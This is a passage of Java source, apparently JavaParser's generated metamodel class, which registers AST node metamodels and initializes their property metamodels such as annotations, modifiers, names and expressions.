moduleProvidesStmtMetaModel.getConstructorParameters().add(moduleProvidesStmtMetaModel.withTypesPropertyMetaModel);
moduleUsesStmtMetaModel.getConstructorParameters().add(moduleUsesStmtMetaModel.typePropertyMetaModel);
moduleOpensStmtMetaModel.getConstructorParameters().add(moduleOpensStmtMetaModel.namePropertyMetaModel);
moduleOpensStmtMetaModel.getConstructorParameters().add(moduleOpensStmtMetaModel.moduleNamesPropertyMetaModel);
}
public static List<BaseNodeMetaModel> getNodeMetaModels() {
return nodeMetaModels;
}
private static void initializeNodeMetaModels() {
nodeMetaModels.add(annotationDeclarationMetaModel);
nodeMetaModels.add(annotationExprMetaModel);
nodeMetaModels.add(annotationMemberDeclarationMetaModel);
nodeMetaModels.add(arrayAccessExprMetaModel);
nodeMetaModels.add(arrayCreationExprMetaModel);
nodeMetaModels.add(arrayCreationLevelMetaModel);
nodeMetaModels.add(arrayInitializerExprMetaModel);
nodeMetaModels.add(arrayTypeMetaModel);
nodeMetaModels.add(assertStmtMetaModel);
nodeMetaModels.add(assignExprMetaModel);
nodeMetaModels.add(binaryExprMetaModel);
nodeMetaModels.add(blockCommentMetaModel);
nodeMetaModels.add(blockStmtMetaModel);
nodeMetaModels.add(bodyDeclarationMetaModel);
nodeMetaModels.add(booleanLiteralExprMetaModel);
nodeMetaModels.add(breakStmtMetaModel);
nodeMetaModels.add(callableDeclarationMetaModel);
nodeMetaModels.add(castExprMetaModel);
nodeMetaModels.add(catchClauseMetaModel);
nodeMetaModels.add(charLiteralExprMetaModel);
nodeMetaModels.add(classExprMetaModel);
nodeMetaModels.add(classOrInterfaceDeclarationMetaModel);
nodeMetaModels.add(classOrInterfaceTypeMetaModel);
nodeMetaModels.add(commentMetaModel);
nodeMetaModels.add(compilationUnitMetaModel);
nodeMetaModels.add(conditionalExprMetaModel);
nodeMetaModels.add(constructorDeclarationMetaModel);
nodeMetaModels.add(continueStmtMetaModel);
nodeMetaModels.add(doStmtMetaModel);
nodeMetaModels.add(doubleLiteralExprMetaModel);
nodeMetaModels.add(emptyMemberDeclarationMetaModel);
nodeMetaModels.add(emptyStmtMetaModel);
nodeMetaModels.add(enclosedExprMetaModel);
nodeMetaModels.add(enumConstantDeclarationMetaModel);
nodeMetaModels.add(enumDeclarationMetaModel);
nodeMetaModels.add(explicitConstructorInvocationStmtMetaModel);
nodeMetaModels.add(expressionMetaModel);
nodeMetaModels.add(expressionStmtMetaModel);
nodeMetaModels.add(fieldAccessExprMetaModel);
nodeMetaModels.add(fieldDeclarationMetaModel);
nodeMetaModels.add(forStmtMetaModel);
nodeMetaModels.add(foreachStmtMetaModel);
nodeMetaModels.add(ifStmtMetaModel);
nodeMetaModels.add(importDeclarationMetaModel);
nodeMetaModels.add(initializerDeclarationMetaModel);
nodeMetaModels.add(instanceOfExprMetaModel);
nodeMetaModels.add(integerLiteralExprMetaModel);
nodeMetaModels.add(intersectionTypeMetaModel);
nodeMetaModels.add(javadocCommentMetaModel);
nodeMetaModels.add(labeledStmtMetaModel);
nodeMetaModels.add(lambdaExprMetaModel);
nodeMetaModels.add(lineCommentMetaModel);
nodeMetaModels.add(literalExprMetaModel);
nodeMetaModels.add(literalStringValueExprMetaModel);
nodeMetaModels.add(localClassDeclarationStmtMetaModel);
nodeMetaModels.add(longLiteralExprMetaModel);
nodeMetaModels.add(markerAnnotationExprMetaModel);
nodeMetaModels.add(memberValuePairMetaModel);
nodeMetaModels.add(methodCallExprMetaModel);
nodeMetaModels.add(methodDeclarationMetaModel);
nodeMetaModels.add(methodReferenceExprMetaModel);
nodeMetaModels.add(moduleDeclarationMetaModel);
nodeMetaModels.add(moduleExportsStmtMetaModel);
nodeMetaModels.add(moduleOpensStmtMetaModel);
nodeMetaModels.add(moduleProvidesStmtMetaModel);
nodeMetaModels.add(moduleRequiresStmtMetaModel);
nodeMetaModels.add(moduleStmtMetaModel);
nodeMetaModels.add(moduleUsesStmtMetaModel);
nodeMetaModels.add(nameExprMetaModel);
nodeMetaModels.add(nameMetaModel);
nodeMetaModels.add(nodeMetaModel);
nodeMetaModels.add(normalAnnotationExprMetaModel);
nodeMetaModels.add(nullLiteralExprMetaModel);
nodeMetaModels.add(objectCreationExprMetaModel);
nodeMetaModels.add(packageDeclarationMetaModel);
nodeMetaModels.add(parameterMetaModel);
nodeMetaModels.add(primitiveTypeMetaModel);
nodeMetaModels.add(referenceTypeMetaModel);
nodeMetaModels.add(returnStmtMetaModel);
nodeMetaModels.add(simpleNameMetaModel);
nodeMetaModels.add(singleMemberAnnotationExprMetaModel);
nodeMetaModels.add(statementMetaModel);
nodeMetaModels.add(stringLiteralExprMetaModel);
nodeMetaModels.add(superExprMetaModel);
nodeMetaModels.add(switchEntryStmtMetaModel);
nodeMetaModels.add(switchStmtMetaModel);
nodeMetaModels.add(synchronizedStmtMetaModel);
nodeMetaModels.add(thisExprMetaModel);
nodeMetaModels.add(throwStmtMetaModel);
nodeMetaModels.add(tryStmtMetaModel);
nodeMetaModels.add(typeDeclarationMetaModel);
nodeMetaModels.add(typeExprMetaModel);
nodeMetaModels.add(typeMetaModel);
nodeMetaModels.add(typeParameterMetaModel);
nodeMetaModels.add(unaryExprMetaModel);
nodeMetaModels.add(unionTypeMetaModel);
nodeMetaModels.add(unknownTypeMetaModel);
nodeMetaModels.add(variableDeclarationExprMetaModel);
nodeMetaModels.add(variableDeclaratorMetaModel);
nodeMetaModels.add(voidTypeMetaModel);
nodeMetaModels.add(whileStmtMetaModel);
nodeMetaModels.add(wildcardTypeMetaModel);
}
private static void initializePropertyMetaModels() {
nodeMetaModel.commentPropertyMetaModel = new PropertyMetaModel(nodeMetaModel, "comment", com.github.javaparser.ast.comments.Comment.class, Optional.of(commentMetaModel), true, false, false, false, false);
nodeMetaModel.getDeclaredPropertyMetaModels().add(nodeMetaModel.commentPropertyMetaModel);
bodyDeclarationMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(bodyDeclarationMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
bodyDeclarationMetaModel.getDeclaredPropertyMetaModels().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
callableDeclarationMetaModel.modifiersPropertyMetaModel = new PropertyMetaModel(callableDeclarationMetaModel, "modifiers", com.github.javaparser.ast.Modifier.class, Optional.empty(), false, false, false, true, false);
callableDeclarationMetaModel.getDeclaredPropertyMetaModels().add(callableDeclarationMetaModel.modifiersPropertyMetaModel);
callableDeclarationMetaModel.namePropertyMetaModel = new PropertyMetaModel(callableDeclarationMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
callableDeclarationMetaModel.getDeclaredPropertyMetaModels().add(callableDeclarationMetaModel.namePropertyMetaModel);
callableDeclarationMetaModel.parametersPropertyMetaModel = new PropertyMetaModel(callableDeclarationMetaModel, "parameters", com.github.javaparser.ast.body.Parameter.class, Optional.of(parameterMetaModel), false, false, true, false, false);
callableDeclarationMetaModel.getDeclaredPropertyMetaModels().add(callableDeclarationMetaModel.parametersPropertyMetaModel);
callableDeclarationMetaModel.thrownExceptionsPropertyMetaModel = new PropertyMetaModel(callableDeclarationMetaModel, "thrownExceptions", com.github.javaparser.ast.type.ReferenceType.class, Optional.of(referenceTypeMetaModel), false, false, true, false, true);
callableDeclarationMetaModel.getDeclaredPropertyMetaModels().add(callableDeclarationMetaModel.thrownExceptionsPropertyMetaModel);
callableDeclarationMetaModel.typeParametersPropertyMetaModel = new PropertyMetaModel(callableDeclarationMetaModel, "typeParameters", com.github.javaparser.ast.type.TypeParameter.class, Optional.of(typeParameterMetaModel), false, false, true, false, false);
callableDeclarationMetaModel.getDeclaredPropertyMetaModels().add(callableDeclarationMetaModel.typeParametersPropertyMetaModel);
typeMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(typeMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
typeMetaModel.getDeclaredPropertyMetaModels().add(typeMetaModel.annotationsPropertyMetaModel);
annotationExprMetaModel.namePropertyMetaModel = new PropertyMetaModel(annotationExprMetaModel, "name", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, false, false, false);
annotationExprMetaModel.getDeclaredPropertyMetaModels().add(annotationExprMetaModel.namePropertyMetaModel);
typeDeclarationMetaModel.membersPropertyMetaModel = new PropertyMetaModel(typeDeclarationMetaModel, "members", com.github.javaparser.ast.body.BodyDeclaration.class, Optional.of(bodyDeclarationMetaModel), false, false, true, false, true);
typeDeclarationMetaModel.getDeclaredPropertyMetaModels().add(typeDeclarationMetaModel.membersPropertyMetaModel);
typeDeclarationMetaModel.modifiersPropertyMetaModel = new PropertyMetaModel(typeDeclarationMetaModel, "modifiers", com.github.javaparser.ast.Modifier.class, Optional.empty(), false, false, false, true, false);
typeDeclarationMetaModel.getDeclaredPropertyMetaModels().add(typeDeclarationMetaModel.modifiersPropertyMetaModel);
typeDeclarationMetaModel.namePropertyMetaModel = new PropertyMetaModel(typeDeclarationMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
typeDeclarationMetaModel.getDeclaredPropertyMetaModels().add(typeDeclarationMetaModel.namePropertyMetaModel);
literalStringValueExprMetaModel.valuePropertyMetaModel = new PropertyMetaModel(literalStringValueExprMetaModel, "value", java.lang.String.class, Optional.empty(), false, false, false, false, false);
literalStringValueExprMetaModel.getDeclaredPropertyMetaModels().add(literalStringValueExprMetaModel.valuePropertyMetaModel);
moduleDeclarationMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(moduleDeclarationMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
moduleDeclarationMetaModel.getDeclaredPropertyMetaModels().add(moduleDeclarationMetaModel.annotationsPropertyMetaModel);
moduleDeclarationMetaModel.isOpenPropertyMetaModel = new PropertyMetaModel(moduleDeclarationMetaModel, "isOpen", boolean.class, Optional.empty(), false, false, false, false, false);
moduleDeclarationMetaModel.getDeclaredPropertyMetaModels().add(moduleDeclarationMetaModel.isOpenPropertyMetaModel);
moduleDeclarationMetaModel.moduleStmtsPropertyMetaModel = new PropertyMetaModel(moduleDeclarationMetaModel, "moduleStmts", com.github.javaparser.ast.modules.ModuleStmt.class, Optional.of(moduleStmtMetaModel), false, false, true, false, false);
moduleDeclarationMetaModel.getDeclaredPropertyMetaModels().add(moduleDeclarationMetaModel.moduleStmtsPropertyMetaModel);
moduleDeclarationMetaModel.namePropertyMetaModel = new PropertyMetaModel(moduleDeclarationMetaModel, "name", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, false, false, false);
moduleDeclarationMetaModel.getDeclaredPropertyMetaModels().add(moduleDeclarationMetaModel.namePropertyMetaModel);
arrayCreationLevelMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(arrayCreationLevelMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
arrayCreationLevelMetaModel.getDeclaredPropertyMetaModels().add(arrayCreationLevelMetaModel.annotationsPropertyMetaModel);
arrayCreationLevelMetaModel.dimensionPropertyMetaModel = new PropertyMetaModel(arrayCreationLevelMetaModel, "dimension", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
arrayCreationLevelMetaModel.getDeclaredPropertyMetaModels().add(arrayCreationLevelMetaModel.dimensionPropertyMetaModel);
compilationUnitMetaModel.importsPropertyMetaModel = new PropertyMetaModel(compilationUnitMetaModel, "imports", com.github.javaparser.ast.ImportDeclaration.class, Optional.of(importDeclarationMetaModel), false, false, true, false, false);
compilationUnitMetaModel.getDeclaredPropertyMetaModels().add(compilationUnitMetaModel.importsPropertyMetaModel);
compilationUnitMetaModel.modulePropertyMetaModel = new PropertyMetaModel(compilationUnitMetaModel, "module", com.github.javaparser.ast.modules.ModuleDeclaration.class, Optional.of(moduleDeclarationMetaModel), true, false, false, false, false);
compilationUnitMetaModel.getDeclaredPropertyMetaModels().add(compilationUnitMetaModel.modulePropertyMetaModel);
compilationUnitMetaModel.packageDeclarationPropertyMetaModel = new PropertyMetaModel(compilationUnitMetaModel, "packageDeclaration", com.github.javaparser.ast.PackageDeclaration.class, Optional.of(packageDeclarationMetaModel), true, false, false, false, false);
compilationUnitMetaModel.getDeclaredPropertyMetaModels().add(compilationUnitMetaModel.packageDeclarationPropertyMetaModel);
compilationUnitMetaModel.typesPropertyMetaModel = new PropertyMetaModel(compilationUnitMetaModel, "types", com.github.javaparser.ast.body.TypeDeclaration.class, Optional.of(typeDeclarationMetaModel), false, false, true, false, true);
compilationUnitMetaModel.getDeclaredPropertyMetaModels().add(compilationUnitMetaModel.typesPropertyMetaModel);
packageDeclarationMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(packageDeclarationMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
packageDeclarationMetaModel.getDeclaredPropertyMetaModels().add(packageDeclarationMetaModel.annotationsPropertyMetaModel);
packageDeclarationMetaModel.namePropertyMetaModel = new PropertyMetaModel(packageDeclarationMetaModel, "name", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, false, false, false);
packageDeclarationMetaModel.getDeclaredPropertyMetaModels().add(packageDeclarationMetaModel.namePropertyMetaModel);
annotationMemberDeclarationMetaModel.defaultValuePropertyMetaModel = new PropertyMetaModel(annotationMemberDeclarationMetaModel, "defaultValue", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
annotationMemberDeclarationMetaModel.getDeclaredPropertyMetaModels().add(annotationMemberDeclarationMetaModel.defaultValuePropertyMetaModel);
annotationMemberDeclarationMetaModel.modifiersPropertyMetaModel = new PropertyMetaModel(annotationMemberDeclarationMetaModel, "modifiers", com.github.javaparser.ast.Modifier.class, Optional.empty(), false, false, false, true, false);
annotationMemberDeclarationMetaModel.getDeclaredPropertyMetaModels().add(annotationMemberDeclarationMetaModel.modifiersPropertyMetaModel);
annotationMemberDeclarationMetaModel.namePropertyMetaModel = new PropertyMetaModel(annotationMemberDeclarationMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
annotationMemberDeclarationMetaModel.getDeclaredPropertyMetaModels().add(annotationMemberDeclarationMetaModel.namePropertyMetaModel);
annotationMemberDeclarationMetaModel.typePropertyMetaModel = new PropertyMetaModel(annotationMemberDeclarationMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
annotationMemberDeclarationMetaModel.getDeclaredPropertyMetaModels().add(annotationMemberDeclarationMetaModel.typePropertyMetaModel);
classOrInterfaceDeclarationMetaModel.extendedTypesPropertyMetaModel = new PropertyMetaModel(classOrInterfaceDeclarationMetaModel, "extendedTypes", com.github.javaparser.ast.type.ClassOrInterfaceType.class, Optional.of(classOrInterfaceTypeMetaModel), false, false, true, false, false);
classOrInterfaceDeclarationMetaModel.getDeclaredPropertyMetaModels().add(classOrInterfaceDeclarationMetaModel.extendedTypesPropertyMetaModel);
classOrInterfaceDeclarationMetaModel.implementedTypesPropertyMetaModel = new PropertyMetaModel(classOrInterfaceDeclarationMetaModel, "implementedTypes", com.github.javaparser.ast.type.ClassOrInterfaceType.class, Optional.of(classOrInterfaceTypeMetaModel), false, false, true, false, false);
classOrInterfaceDeclarationMetaModel.getDeclaredPropertyMetaModels().add(classOrInterfaceDeclarationMetaModel.implementedTypesPropertyMetaModel);
classOrInterfaceDeclarationMetaModel.isInterfacePropertyMetaModel = new PropertyMetaModel(classOrInterfaceDeclarationMetaModel, "isInterface", boolean.class, Optional.empty(), false, false, false, false, false);
classOrInterfaceDeclarationMetaModel.getDeclaredPropertyMetaModels().add(classOrInterfaceDeclarationMetaModel.isInterfacePropertyMetaModel);
classOrInterfaceDeclarationMetaModel.typeParametersPropertyMetaModel = new PropertyMetaModel(classOrInterfaceDeclarationMetaModel, "typeParameters", com.github.javaparser.ast.type.TypeParameter.class, Optional.of(typeParameterMetaModel), false, false, true, false, false);
classOrInterfaceDeclarationMetaModel.getDeclaredPropertyMetaModels().add(classOrInterfaceDeclarationMetaModel.typeParametersPropertyMetaModel);
constructorDeclarationMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(constructorDeclarationMetaModel, "body", com.github.javaparser.ast.stmt.BlockStmt.class, Optional.of(blockStmtMetaModel), false, false, false, false, false);
constructorDeclarationMetaModel.getDeclaredPropertyMetaModels().add(constructorDeclarationMetaModel.bodyPropertyMetaModel);
enumConstantDeclarationMetaModel.argumentsPropertyMetaModel = new PropertyMetaModel(enumConstantDeclarationMetaModel, "arguments", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, true, false, false);
enumConstantDeclarationMetaModel.getDeclaredPropertyMetaModels().add(enumConstantDeclarationMetaModel.argumentsPropertyMetaModel);
enumConstantDeclarationMetaModel.classBodyPropertyMetaModel = new PropertyMetaModel(enumConstantDeclarationMetaModel, "classBody", com.github.javaparser.ast.body.BodyDeclaration.class, Optional.of(bodyDeclarationMetaModel), false, false, true, false, true);
enumConstantDeclarationMetaModel.getDeclaredPropertyMetaModels().add(enumConstantDeclarationMetaModel.classBodyPropertyMetaModel);
enumConstantDeclarationMetaModel.namePropertyMetaModel = new PropertyMetaModel(enumConstantDeclarationMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
enumConstantDeclarationMetaModel.getDeclaredPropertyMetaModels().add(enumConstantDeclarationMetaModel.namePropertyMetaModel);
enumDeclarationMetaModel.entriesPropertyMetaModel = new PropertyMetaModel(enumDeclarationMetaModel, "entries", com.github.javaparser.ast.body.EnumConstantDeclaration.class, Optional.of(enumConstantDeclarationMetaModel), false, false, true, false, false);
enumDeclarationMetaModel.getDeclaredPropertyMetaModels().add(enumDeclarationMetaModel.entriesPropertyMetaModel);
enumDeclarationMetaModel.implementedTypesPropertyMetaModel = new PropertyMetaModel(enumDeclarationMetaModel, "implementedTypes", com.github.javaparser.ast.type.ClassOrInterfaceType.class, Optional.of(classOrInterfaceTypeMetaModel), false, false, true, false, false);
enumDeclarationMetaModel.getDeclaredPropertyMetaModels().add(enumDeclarationMetaModel.implementedTypesPropertyMetaModel);
fieldDeclarationMetaModel.modifiersPropertyMetaModel = new PropertyMetaModel(fieldDeclarationMetaModel, "modifiers", com.github.javaparser.ast.Modifier.class, Optional.empty(), false, false, false, true, false);
fieldDeclarationMetaModel.getDeclaredPropertyMetaModels().add(fieldDeclarationMetaModel.modifiersPropertyMetaModel);
fieldDeclarationMetaModel.variablesPropertyMetaModel = new PropertyMetaModel(fieldDeclarationMetaModel, "variables", com.github.javaparser.ast.body.VariableDeclarator.class, Optional.of(variableDeclaratorMetaModel), false, true, true, false, false);
fieldDeclarationMetaModel.getDeclaredPropertyMetaModels().add(fieldDeclarationMetaModel.variablesPropertyMetaModel);
fieldDeclarationMetaModel.maximumCommonTypePropertyMetaModel = new PropertyMetaModel(fieldDeclarationMetaModel, "maximumCommonType", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
fieldDeclarationMetaModel.getDerivedPropertyMetaModels().add(fieldDeclarationMetaModel.maximumCommonTypePropertyMetaModel);
initializerDeclarationMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(initializerDeclarationMetaModel, "body", com.github.javaparser.ast.stmt.BlockStmt.class, Optional.of(blockStmtMetaModel), false, false, false, false, false);
initializerDeclarationMetaModel.getDeclaredPropertyMetaModels().add(initializerDeclarationMetaModel.bodyPropertyMetaModel);
initializerDeclarationMetaModel.isStaticPropertyMetaModel = new PropertyMetaModel(initializerDeclarationMetaModel, "isStatic", boolean.class, Optional.empty(), false, false, false, false, false);
initializerDeclarationMetaModel.getDeclaredPropertyMetaModels().add(initializerDeclarationMetaModel.isStaticPropertyMetaModel);
methodDeclarationMetaModel.bodyPropertyMetaModel = new PropertyMetaModel(methodDeclarationMetaModel, "body", com.github.javaparser.ast.stmt.BlockStmt.class, Optional.of(blockStmtMetaModel), true, false, false, false, false);
methodDeclarationMetaModel.getDeclaredPropertyMetaModels().add(methodDeclarationMetaModel.bodyPropertyMetaModel);
methodDeclarationMetaModel.typePropertyMetaModel = new PropertyMetaModel(methodDeclarationMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
methodDeclarationMetaModel.getDeclaredPropertyMetaModels().add(methodDeclarationMetaModel.typePropertyMetaModel);
parameterMetaModel.annotationsPropertyMetaModel = new PropertyMetaModel(parameterMetaModel, "annotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
parameterMetaModel.getDeclaredPropertyMetaModels().add(parameterMetaModel.annotationsPropertyMetaModel);
parameterMetaModel.isVarArgsPropertyMetaModel = new PropertyMetaModel(parameterMetaModel, "isVarArgs", boolean.class, Optional.empty(), false, false, false, false, false);
parameterMetaModel.getDeclaredPropertyMetaModels().add(parameterMetaModel.isVarArgsPropertyMetaModel);
parameterMetaModel.modifiersPropertyMetaModel = new PropertyMetaModel(parameterMetaModel, "modifiers", com.github.javaparser.ast.Modifier.class, Optional.empty(), false, false, false, true, false);
parameterMetaModel.getDeclaredPropertyMetaModels().add(parameterMetaModel.modifiersPropertyMetaModel);
parameterMetaModel.namePropertyMetaModel = new PropertyMetaModel(parameterMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
parameterMetaModel.getDeclaredPropertyMetaModels().add(parameterMetaModel.namePropertyMetaModel);
parameterMetaModel.typePropertyMetaModel = new PropertyMetaModel(parameterMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
parameterMetaModel.getDeclaredPropertyMetaModels().add(parameterMetaModel.typePropertyMetaModel);
parameterMetaModel.varArgsAnnotationsPropertyMetaModel = new PropertyMetaModel(parameterMetaModel, "varArgsAnnotations", com.github.javaparser.ast.expr.AnnotationExpr.class, Optional.of(annotationExprMetaModel), false, false, true, false, false);
parameterMetaModel.getDeclaredPropertyMetaModels().add(parameterMetaModel.varArgsAnnotationsPropertyMetaModel);
variableDeclaratorMetaModel.initializerPropertyMetaModel = new PropertyMetaModel(variableDeclaratorMetaModel, "initializer", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, true, false, false, false);
variableDeclaratorMetaModel.getDeclaredPropertyMetaModels().add(variableDeclaratorMetaModel.initializerPropertyMetaModel);
variableDeclaratorMetaModel.namePropertyMetaModel = new PropertyMetaModel(variableDeclaratorMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
variableDeclaratorMetaModel.getDeclaredPropertyMetaModels().add(variableDeclaratorMetaModel.namePropertyMetaModel);
variableDeclaratorMetaModel.typePropertyMetaModel = new PropertyMetaModel(variableDeclaratorMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
variableDeclaratorMetaModel.getDeclaredPropertyMetaModels().add(variableDeclaratorMetaModel.typePropertyMetaModel);
commentMetaModel.contentPropertyMetaModel = new PropertyMetaModel(commentMetaModel, "content", java.lang.String.class, Optional.empty(), false, false, false, false, false);
commentMetaModel.getDeclaredPropertyMetaModels().add(commentMetaModel.contentPropertyMetaModel);
arrayAccessExprMetaModel.indexPropertyMetaModel = new PropertyMetaModel(arrayAccessExprMetaModel, "index", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
arrayAccessExprMetaModel.getDeclaredPropertyMetaModels().add(arrayAccessExprMetaModel.indexPropertyMetaModel);
arrayAccessExprMetaModel.namePropertyMetaModel = new PropertyMetaModel(arrayAccessExprMetaModel, "name", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
arrayAccessExprMetaModel.getDeclaredPropertyMetaModels().add(arrayAccessExprMetaModel.namePropertyMetaModel);
arrayCreationExprMetaModel.elementTypePropertyMetaModel = new PropertyMetaModel(arrayCreationExprMetaModel, "elementType", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
arrayCreationExprMetaModel.getDeclaredPropertyMetaModels().add(arrayCreationExprMetaModel.elementTypePropertyMetaModel);
arrayCreationExprMetaModel.initializerPropertyMetaModel = new PropertyMetaModel(arrayCreationExprMetaModel, "initializer", com.github.javaparser.ast.expr.ArrayInitializerExpr.class, Optional.of(arrayInitializerExprMetaModel), true, false, false, false, false);
arrayCreationExprMetaModel.getDeclaredPropertyMetaModels().add(arrayCreationExprMetaModel.initializerPropertyMetaModel);
arrayCreationExprMetaModel.levelsPropertyMetaModel = new PropertyMetaModel(arrayCreationExprMetaModel, "levels", com.github.javaparser.ast.ArrayCreationLevel.class, Optional.of(arrayCreationLevelMetaModel), false, true, true, false, false);
arrayCreationExprMetaModel.getDeclaredPropertyMetaModels().add(arrayCreationExprMetaModel.levelsPropertyMetaModel);
arrayInitializerExprMetaModel.valuesPropertyMetaModel = new PropertyMetaModel(arrayInitializerExprMetaModel, "values", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, true, false, false);
arrayInitializerExprMetaModel.getDeclaredPropertyMetaModels().add(arrayInitializerExprMetaModel.valuesPropertyMetaModel);
assignExprMetaModel.operatorPropertyMetaModel = new PropertyMetaModel(assignExprMetaModel, "operator", com.github.javaparser.ast.expr.AssignExpr.Operator.class, Optional.empty(), false, false, false, false, false);
assignExprMetaModel.getDeclaredPropertyMetaModels().add(assignExprMetaModel.operatorPropertyMetaModel);
assignExprMetaModel.targetPropertyMetaModel = new PropertyMetaModel(assignExprMetaModel, "target", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
assignExprMetaModel.getDeclaredPropertyMetaModels().add(assignExprMetaModel.targetPropertyMetaModel);
assignExprMetaModel.valuePropertyMetaModel = new PropertyMetaModel(assignExprMetaModel, "value", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
assignExprMetaModel.getDeclaredPropertyMetaModels().add(assignExprMetaModel.valuePropertyMetaModel);
binaryExprMetaModel.leftPropertyMetaModel = new PropertyMetaModel(binaryExprMetaModel, "left", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
binaryExprMetaModel.getDeclaredPropertyMetaModels().add(binaryExprMetaModel.leftPropertyMetaModel);
binaryExprMetaModel.operatorPropertyMetaModel = new PropertyMetaModel(binaryExprMetaModel, "operator", com.github.javaparser.ast.expr.BinaryExpr.Operator.class, Optional.empty(), false, false, false, false, false);
binaryExprMetaModel.getDeclaredPropertyMetaModels().add(binaryExprMetaModel.operatorPropertyMetaModel);
binaryExprMetaModel.rightPropertyMetaModel = new PropertyMetaModel(binaryExprMetaModel, "right", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
binaryExprMetaModel.getDeclaredPropertyMetaModels().add(binaryExprMetaModel.rightPropertyMetaModel);
booleanLiteralExprMetaModel.valuePropertyMetaModel = new PropertyMetaModel(booleanLiteralExprMetaModel, "value", boolean.class, Optional.empty(), false, false, false, false, false);
booleanLiteralExprMetaModel.getDeclaredPropertyMetaModels().add(booleanLiteralExprMetaModel.valuePropertyMetaModel);
castExprMetaModel.expressionPropertyMetaModel = new PropertyMetaModel(castExprMetaModel, "expression", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
castExprMetaModel.getDeclaredPropertyMetaModels().add(castExprMetaModel.expressionPropertyMetaModel);
castExprMetaModel.typePropertyMetaModel = new PropertyMetaModel(castExprMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
castExprMetaModel.getDeclaredPropertyMetaModels().add(castExprMetaModel.typePropertyMetaModel);
classExprMetaModel.typePropertyMetaModel = new PropertyMetaModel(classExprMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
classExprMetaModel.getDeclaredPropertyMetaModels().add(classExprMetaModel.typePropertyMetaModel);
conditionalExprMetaModel.conditionPropertyMetaModel = new PropertyMetaModel(conditionalExprMetaModel, "condition", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
conditionalExprMetaModel.getDeclaredPropertyMetaModels().add(conditionalExprMetaModel.conditionPropertyMetaModel);
conditionalExprMetaModel.elseExprPropertyMetaModel = new PropertyMetaModel(conditionalExprMetaModel, "elseExpr", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
conditionalExprMetaModel.getDeclaredPropertyMetaModels().add(conditionalExprMetaModel.elseExprPropertyMetaModel);
conditionalExprMetaModel.thenExprPropertyMetaModel = new PropertyMetaModel(conditionalExprMetaModel, "thenExpr", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
conditionalExprMetaModel.getDeclaredPropertyMetaModels().add(conditionalExprMetaModel.thenExprPropertyMetaModel);
enclosedExprMetaModel.innerPropertyMetaModel = new PropertyMetaModel(enclosedExprMetaModel, "inner", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
